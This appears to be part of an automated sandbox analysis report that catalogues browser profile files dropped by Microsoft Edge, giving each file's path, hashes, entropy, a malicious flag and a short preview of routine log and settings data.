Preview:	2024/07/26-11:57:12.511 1de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/07/26-11:57:12.512 1de0 Recovering log #3.2024/07/26-11:57:12.512 1de0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	380
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
MD5:	9FE07A071FDA31327FA322B32FCA0B7E
SHA1:	A3E0BAE8853A163C9BB55F68616C795AAAF462E8
SHA-256:	E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
SHA-512:	9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.2289809943332575
Encrypted:	false
SSDEEP:	6:BMcp+q2P923oH+Tcwt8aPrqIFUt84McFZmw+4McwVkwO923oH+Tcwt8amLJ:Zkv4YebL3FUt8sF/+so5LYebQJ
MD5:	501040DAFEEDA4F8269B7BCF324CFD6E
SHA1:	5275D9B9745C42E91C6F2A99577BA0B65ED686A8
SHA-256:	828C16F6942971C55776A5BAE5CAF8EFD6ACCF2E15CE639BE1EC0DE2E925B7C0
SHA-512:	5A0B0358D4A463D4920CC8BE61F7198DD346FB3685A992943C1CCEB42CD53EE68200B8B5D2B5E147EA6BD696BA8996A560EECE6FB43F5B3BDD20AF775BF10F31
Malicious:	false
Preview:	2024/07/26-11:57:12.513 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/07/26-11:57:12.513 1d98 Recovering log #3.2024/07/26-11:57:12.514 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.2289809943332575
Encrypted:	false
SSDEEP:	6:BMcp+q2P923oH+Tcwt8aPrqIFUt84McFZmw+4McwVkwO923oH+Tcwt8amLJ:Zkv4YebL3FUt8sF/+so5LYebQJ
MD5:	501040DAFEEDA4F8269B7BCF324CFD6E
SHA1:	5275D9B9745C42E91C6F2A99577BA0B65ED686A8
SHA-256:	828C16F6942971C55776A5BAE5CAF8EFD6ACCF2E15CE639BE1EC0DE2E925B7C0
SHA-512:	5A0B0358D4A463D4920CC8BE61F7198DD346FB3685A992943C1CCEB42CD53EE68200B8B5D2B5E147EA6BD696BA8996A560EECE6FB43F5B3BDD20AF775BF10F31
Malicious:	false
Preview:	2024/07/26-11:57:12.513 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/07/26-11:57:12.513 1d98 Recovering log #3.2024/07/26-11:57:12.514 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	380
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
MD5:	9FE07A071FDA31327FA322B32FCA0B7E
SHA1:	A3E0BAE8853A163C9BB55F68616C795AAAF462E8
SHA-256:	E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
SHA-512:	9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.2193741530229705
Encrypted:	false
SSDEEP:	6:BMcpt+q2P923oH+Tcwt865IFUt84Mcp5Zmw+4McptVkwO923oH+Tcwt86+ULJ:Zpov4Yeb/WFUt8sp5/+spT5LYeb/+SJ
MD5:	56E6AC34DB44AEC03094D4A4C8E83F2E
SHA1:	36431B12B5070DBA99068AD7FB52BE6C1038002E
SHA-256:	D2815ED8D11BD74A795D13AAB5C3DD1815E61F0FDFAD76B29128966468CAE0E3
SHA-512:	8477F659817D8A2286EE2CD33B1AB2E4D2A1172B3AFC9324F9F56266407A5173D08C213263E604DDF4E1D4A0DCECDA1BD8BA8E79E40DC69B4A9463BE087099A8
Malicious:	false
Preview:	2024/07/26-11:57:12.520 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/07/26-11:57:12.520 1d98 Recovering log #3.2024/07/26-11:57:12.520 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.2193741530229705
Encrypted:	false
SSDEEP:	6:BMcpt+q2P923oH+Tcwt865IFUt84Mcp5Zmw+4McptVkwO923oH+Tcwt86+ULJ:Zpov4Yeb/WFUt8sp5/+spT5LYeb/+SJ
MD5:	56E6AC34DB44AEC03094D4A4C8E83F2E
SHA1:	36431B12B5070DBA99068AD7FB52BE6C1038002E
SHA-256:	D2815ED8D11BD74A795D13AAB5C3DD1815E61F0FDFAD76B29128966468CAE0E3
SHA-512:	8477F659817D8A2286EE2CD33B1AB2E4D2A1172B3AFC9324F9F56266407A5173D08C213263E604DDF4E1D4A0DCECDA1BD8BA8E79E40DC69B4A9463BE087099A8
Malicious:	false
Preview:	2024/07/26-11:57:12.520 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/07/26-11:57:12.520 1d98 Recovering log #3.2024/07/26-11:57:12.520 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1140
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
MD5:	914FD8DC5F9A741C6947E1AB12A9D113
SHA1:	6529EFE14E7B0BEA47D78B147243096408CDAAE4
SHA-256:	8BE3C96EE64B5D2768057EA1C4D1A70F40A0041585F3173806E2278E9300960B
SHA-512:	2862BF83C061414EFA2AC035FFC25BA9C4ED523B430FDEEED4974F55D4450A62766C2E799D0ACDB8269210078547048ACAABFD78EDE6AB91133E30F6B5EBFFBD
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.236233277775151
Encrypted:	false
SSDEEP:	6:BMut+q2P923oH+Tcwt8NIFUt84MuyZmw+4MuOVkwO923oH+Tcwt8+eLJ:wv4YebpFUt8d/+v5LYebqJ
MD5:	6FA88863EC4B7D2AC9D6BB71E5938EC4
SHA1:	2F4D69132DFE86B3FB71B7B6F3E59F960615387E
SHA-256:	56AB6A520898DE20FB99B527D51B4B67616CFB721D3FF6BD8B2EF73A32155613
SHA-512:	D549D53C8F9292018AE243DD71BDB666DFA6AA668D40CA1A7C7CD2EEEC43763C1BE393A12353B2051FA1AC330FCCF7747750F2010F450549551DD7C2AA277248
Malicious:	false
Preview:	2024/07/26-11:57:13.572 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/07/26-11:57:13.573 1d98 Recovering log #3.2024/07/26-11:57:13.573 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.236233277775151
Encrypted:	false
SSDEEP:	6:BMut+q2P923oH+Tcwt8NIFUt84MuyZmw+4MuOVkwO923oH+Tcwt8+eLJ:wv4YebpFUt8d/+v5LYebqJ
MD5:	6FA88863EC4B7D2AC9D6BB71E5938EC4
SHA1:	2F4D69132DFE86B3FB71B7B6F3E59F960615387E
SHA-256:	56AB6A520898DE20FB99B527D51B4B67616CFB721D3FF6BD8B2EF73A32155613
SHA-512:	D549D53C8F9292018AE243DD71BDB666DFA6AA668D40CA1A7C7CD2EEEC43763C1BE393A12353B2051FA1AC330FCCF7747750F2010F450549551DD7C2AA277248
Malicious:	false
Preview:	2024/07/26-11:57:13.572 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/07/26-11:57:13.573 1d98 Recovering log #3.2024/07/26-11:57:13.573 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	37448
Entropy (8bit):	0.02598431411085562
Encrypted:	false
SSDEEP:	3:W9tFllB/vXll9/NllOtfllw/NlltltFlletfllbltFllzltFllmtfllU:0IkXOlblak
MD5:	8D16662E025AB3A8149B70214D6102AF
SHA1:	5A1D53718A7F7D0FA67F28628A9E740640134F3C
SHA-256:	F5E6AB6C19203E87A904636706E120E8E99248F713420A3C2C43FDAE21C2091E
SHA-512:	8055BD5F9ECA0D551173C93EF11EC73DF1E845B27C8841FFAC09309E2FE3E7A7D2B6BC28B01EA935C96A47CAAC98390503F7B1480E8AC029ED7A600F0F72109E
Malicious:	true
Preview:	............:..r...&...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.257036242638523
Encrypted:	false
SSDEEP:	12:Mgyv4Yeb8rcHEZrELFUt8rQ/+3R5LYeb8rcHEZrEZSJ:M4Yeb8nZrExg8tLYeb8nZrEZe
MD5:	254D891C451575E5236FF034B9240AAC
SHA1:	EDF76A94D7BC72BC72D9F075A7F9B0492A9D91CB
SHA-256:	DEF98EB1DB642169E57C270E86C2F1F83FD46F37C0A189988F8BF9013684247B
SHA-512:	75E3B9D59E81DAF9C9BF96D6EF1D4313BA73FA5E85871D56205F5A4A531EC7BD70FAACD140CBF925AFBBB562D5350C93A414917647085163028C1D990FE91193
Malicious:	false
Preview:	2024/07/26-11:57:22.246 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/07/26-11:57:22.246 1de4 Recovering log #3.2024/07/26-11:57:22.247 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.257036242638523
Encrypted:	false
SSDEEP:	12:Mgyv4Yeb8rcHEZrELFUt8rQ/+3R5LYeb8rcHEZrEZSJ:M4Yeb8nZrExg8tLYeb8nZrEZe
MD5:	254D891C451575E5236FF034B9240AAC
SHA1:	EDF76A94D7BC72BC72D9F075A7F9B0492A9D91CB
SHA-256:	DEF98EB1DB642169E57C270E86C2F1F83FD46F37C0A189988F8BF9013684247B
SHA-512:	75E3B9D59E81DAF9C9BF96D6EF1D4313BA73FA5E85871D56205F5A4A531EC7BD70FAACD140CBF925AFBBB562D5350C93A414917647085163028C1D990FE91193
Malicious:	false
Preview:	2024/07/26-11:57:22.246 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/07/26-11:57:22.246 1de4 Recovering log #3.2024/07/26-11:57:22.247 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.1920295698473495
Encrypted:	false
SSDEEP:	6:BMuLi+q2P923oH+Tcwt8a2jMGIFUt84MuLBTZmw+4MuIVkwO923oH+Tcwt8a2jM4:Dzv4Yeb8EFUt8cBT/+Z5LYeb8bJ
MD5:	7AFF6D6323643753BBB75A733DBCA799
SHA1:	CCB8509288DE539B88495F2FE7A247542EAC94FB
SHA-256:	7DD919A151D48DBA4F08FE526FBCB43AF4518933CB7DF399C87B0A3FC3001CE2
SHA-512:	4DB17C89E46BB60E86711151A79F5407F2EA29B3C4A17814BD3161485D1ED82200933E63E3CB9E89981EFFFA18F4F3751592E6FF5DCDCCDD9E857C424698B562
Malicious:	false
Preview:	2024/07/26-11:57:13.084 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/07/26-11:57:13.085 1f08 Recovering log #3.2024/07/26-11:57:13.091 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.1920295698473495
Encrypted:	false
SSDEEP:	6:BMuLi+q2P923oH+Tcwt8a2jMGIFUt84MuLBTZmw+4MuIVkwO923oH+Tcwt8a2jM4:Dzv4Yeb8EFUt8cBT/+Z5LYeb8bJ
MD5:	7AFF6D6323643753BBB75A733DBCA799
SHA1:	CCB8509288DE539B88495F2FE7A247542EAC94FB
SHA-256:	7DD919A151D48DBA4F08FE526FBCB43AF4518933CB7DF399C87B0A3FC3001CE2
SHA-512:	4DB17C89E46BB60E86711151A79F5407F2EA29B3C4A17814BD3161485D1ED82200933E63E3CB9E89981EFFFA18F4F3751592E6FF5DCDCCDD9E857C424698B562
Malicious:	false
Preview:	2024/07/26-11:57:13.084 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/07/26-11:57:13.085 1f08 Recovering log #3.2024/07/26-11:57:13.091 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\32107250-635a-465d-b6dd-3551630a06c7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3a160f2f-6f59-4735-ab5c-12a4d281ebb0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF44c67.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9783
Entropy (8bit):	5.114970239683246
Encrypted:	false
SSDEEP:	192:stGTkdCsSoAsZihUkaw3F8nbV+Fi4QA66W8YaFIMY+PaYJ:stGTpsSoAfhYbGxQx6W7aTYE
MD5:	8C91769AE57BB46BFBA37F236D50C758
SHA1:	F5B524B67D69C576E08DAF44DF871120A2538BD4
SHA-256:	6EC7EDB6B8B9E434831FE93E3C80699D63104A39DF8F3231418C3B2DF4A20488
SHA-512:	C8AC1CA72C0788E4E714C1B7F0E23BC4674CDF9E0860BC0B49162F4FEB1BDA0F16C9231DB73335E9159C91D973BB8C15FCB494B6194273BF3076E91548095116
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366483033032912","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24853
Entropy (8bit):	5.565628942644612
Encrypted:	false
SSDEEP:	768:guxAKRWPXLfnG8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZQ9MGrw7gp9tun:guxAKRWPXLfnGu1jaUWMD+tI
MD5:	58E5C81E95EB594E4470A44A7323153E
SHA1:	1A52AE63EADB8DD814ACC8BEFD60AB3B247934AF
SHA-256:	086FEA417DB232AB402224ED4BF4B1D8DAC2E79BE637EC35865B6201061B3FE9
SHA-512:	2407E4288F619C3C10CD3EDF0F2C616E406EB2C54CB27E73B4C2FE03A4B610053AA85C7572141D1CDBA367F10C3653694759287B860B6A417FC0F650965E3F82
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13366483032468145","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13366483032468145","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	250
Entropy (8bit):	4.457168573077179
Encrypted:	false
SSDEEP:	6:S85aEFljljljljlvkflaDDHEEEhRD9w+CV:S+a8ljljljljlvUUiF++CV
MD5:	AE0A1F5DDF55C27ABCA4CC176AB73765
SHA1:	62CD9F218210D61E6C922AC24AF9BC9072551161
SHA-256:	A65AF64C4D6A960A92B3EC15FA3BCDC6E2BA48F42C8CF412BD54AAB9B36FE211
SHA-512:	A89034F118C1C0E367550FCA27DFFB74BC0269F259C8AE0121A49107CC4E24E485907F0D874B8C150DC5753D099A16DFB43B69EB9093A49070870B1425F2079A
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............A.r.j................next-map-id.1.Knamespace-ea787569_6ecd_4418_84f0_c4bbdcfc37eb-https://accounts.google.com/.0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.174628186824822
Encrypted:	false
SSDEEP:	6:BMud+q2P923oH+TcwtrQMxIFUt84MuM5Zmw+4MutVkwO923oH+TcwtrQMFLJ:Qv4YebCFUt8n/+a5LYebtJ
MD5:	8A4BFC57DE5ABAD176BC42D278231B1E
SHA1:	1DFEE4E09F0C13B43F1D3FC98749A290A8FF5306
SHA-256:	EF18253B8629C134FDB6ABB681FCCEF1B04BD51E9BEB6767EFFA7E7DD5B8E05B
SHA-512:	88B4460688683759876F3CB6F0CC5E6AE3E22A16560596752C4DD6A33BDF4D7188823D6D2E0BB2C9576FE30B52BA267CBEC0A9E8B96A8A1A53981E4D02CA7D1D
Malicious:	false
Preview:	2024/07/26-11:57:13.099 1f38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/07/26-11:57:13.100 1f38 Recovering log #3.2024/07/26-11:57:13.114 1f38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.174628186824822
Encrypted:	false
SSDEEP:	6:BMud+q2P923oH+TcwtrQMxIFUt84MuM5Zmw+4MutVkwO923oH+TcwtrQMFLJ:Qv4YebCFUt8n/+a5LYebtJ
MD5:	8A4BFC57DE5ABAD176BC42D278231B1E
SHA1:	1DFEE4E09F0C13B43F1D3FC98749A290A8FF5306
SHA-256:	EF18253B8629C134FDB6ABB681FCCEF1B04BD51E9BEB6767EFFA7E7DD5B8E05B
SHA-512:	88B4460688683759876F3CB6F0CC5E6AE3E22A16560596752C4DD6A33BDF4D7188823D6D2E0BB2C9576FE30B52BA267CBEC0A9E8B96A8A1A53981E4D02CA7D1D
Malicious:	false
Preview:	2024/07/26-11:57:13.099 1f38 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/07/26-11:57:13.100 1f38 Recovering log #3.2024/07/26-11:57:13.114 1f38 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13366483034970725

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1631
Entropy (8bit):	4.884316045151326
Encrypted:	false
SSDEEP:	48:37jTwSXbfevYCO1bHxg6OdYJmJYCO1bHxg6OdYJmJYCO1bHxg6OdYJm:3bJXaW1HxbfmU1HxbfmU1Hxbfm
MD5:	ACF22846C7D1888E6F17346D7D5D4E95
SHA1:	45B242B0AE08F6536051C516D018478DFB297D1E
SHA-256:	13BD5EC5D2ACD706EF2DE4A9C053FA2CBC3EFC89B022837ADD58F1B7F7E0174D
SHA-512:	879D474176715127616B377D980ECE68BAA48F5D787FE259F11008F1F659E64DD33EF306A59F3812F7DA6F4DAD84A58F46214701245DBC18549C2E47E377306E
Malicious:	false
Preview:	SNSS..........t..............t......"...t..............t..........t..........t..........t....!.....t..................................t...t1..,......t$...ea787569_6ecd_4418_84f0_c4bbdcfc37eb......t..........t....%.I...........t......t..........................t....................5..0......t&...{98952893-68FF-4A5D-A164-705C709ED3DB}........t.............t..............................t..................to...Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36.........................Not;A=Brand.....8.......Chromium....117.....Google Chrome.......117.........Not;A=Brand.....8.0.0.0.....Chromium....117.0.5938.132......Google Chrome.......117.0.5938.132......117.0.5938.132......Windows.....10.0.0......x86.............64....................t..................to...Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36.........................Not;A=Brand.....8.......Chromium...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.159778618815549
Encrypted:	false
